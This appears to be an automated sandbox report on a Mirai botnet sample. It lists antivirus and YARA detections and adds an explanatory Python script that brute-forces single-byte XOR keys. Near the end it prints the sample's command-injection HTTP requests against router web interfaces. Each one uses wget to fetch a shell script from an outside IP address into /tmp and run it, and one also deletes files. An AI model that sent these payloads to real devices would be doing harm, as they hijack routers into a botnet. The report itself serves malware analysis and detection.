Linux Analysis Report
tknjinyyHK

Overview

General Information

Sample Name: tknjinyyHK
Analysis ID: 679630
MD5: 207b92b6ce447a8be88fee4f5ab257d6
SHA1: a2b8c7518f370a978dda19ade031c9d1885acb5e
SHA256: 7274ee8cc094cdfcab48b23978837b12d01bd426202f34d7191e0f6fc3ae18d3
Tags: 32, elf, intel, mirai

Detection

Mirai
Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Machine Learning detection for sample
Enumerates processes within the "proc" file system
Yara signature match
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

Source: tknjinyyHK Avira: detected
Source: tknjinyyHK Virustotal: Detection: 55%
Source: tknjinyyHK Metadefender: Detection: 37%
Source: tknjinyyHK ReversingLabs: Detection: 69%
Source: tknjinyyHK Joe Sandbox ML: detected
Source: tknjinyyHK String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: tknjinyyHK String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: tknjinyyHK String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: tknjinyyHK String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: tknjinyyHK String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: tknjinyyHK String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: tknjinyyHK String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: tknjinyyHK String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: tknjinyyHK String found in binary or memory: http://purenetworks.com/HNAP1/
Source: tknjinyyHK String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: tknjinyyHK String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: tknjinyyHK, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: tknjinyyHK, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6235.1.000000000905c000.000000000905d000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.000000000905c000.000000000905d000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.0000000008062000.0000000008063000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.0000000008062000.0000000008063000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
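The SUSP_XORed_Mozilla matches above tell you that a single-byte-XORed 'Mozilla/5.0' exists in the file and in the r-x and rw- process memory regions, but, as the rule description says, YARA's xor modifier cannot report which key was used. The following is an added example, not part of the report and not code from the sample or from the rule author: it brute-forces the key the same way the linked CyberChef recipe does, by XORing the needle with each candidate key and searching the buffer, then decodes the surrounding string up to its XORed NUL terminator. The string table it runs on is constructed here (key 0x37 is an arbitrary choice for the demo); the key this sample actually uses is not given on the page.

```python
from __future__ import annotations

KEYWORD = b"Mozilla/5.0"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single key byte."""
    return bytes(b ^ key for b in data)


def find_xored_keyword(buf: bytes, keyword: bytes = KEYWORD) -> list[tuple[int, int]]:
    """(key, offset) for every single-byte key under which keyword occurs in buf.

    The needle is XORed instead of the whole buffer, so the scan is 255 searches
    over buf rather than 255 decoded copies of it. Key 0 (plaintext) is skipped:
    a plaintext user agent is what an ordinary YARA string match already reports.
    """
    hits: list[tuple[int, int]] = []
    for key in range(1, 256):
        needle = xor_bytes(keyword, key)
        start = 0
        while (idx := buf.find(needle, start)) >= 0:
            hits.append((key, idx))
            start = idx + 1
    return hits


def recover_string(buf: bytes, key: int, offset: int) -> str:
    """Decode from offset up to the XORed NUL terminator.

    A NUL XORed with the key is the key byte itself, so that is the terminator
    to look for; no other plaintext byte can produce it.
    """
    end = buf.find(bytes([key]), offset)
    if end < 0:
        end = len(buf)
    return xor_bytes(buf[offset:end], key).decode("latin-1")


def build_sample(key: int = 0x37) -> bytes:
    """Constructed string table: plaintext entries around one entry XORed with key.

    These bytes are made up for the example; they are not from the analysed file.
    """
    ua = b"User-Agent: Mozilla/5.0 (Windows NT 10.0)\x00"
    return b"GET / HTTP/1.1\x00" + xor_bytes(ua, key) + b"Host: example\x00"


if __name__ == "__main__":
    blob = build_sample()
    for key, off in find_xored_keyword(blob):
        print(f"key=0x{key:02x} offset={off}: {recover_string(blob, key, off)!r}")
```

To use it on the real file, pass `open(path, "rb").read()` as `buf`; the reported offset is then a file offset you can take straight into a disassembler or hex editor. Once a key is known, XORing the whole buffer with it and running `strings` usually exposes the rest of the obfuscated table (C2 host, scanner credentials, the other HTTP header fragments) in one pass. In the original Mirai source the table encoding reduces to a single-byte XOR, which is why a single-byte brute force is the appropriate tool for this family; whether this particular build keeps that scheme is not something the report states.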
Source: Initial sample Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
Source: Initial sample Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample Potential command found: GET /index.php?s=/index/hink
Source: ELF static info symbol of initial sample .symtab present: no
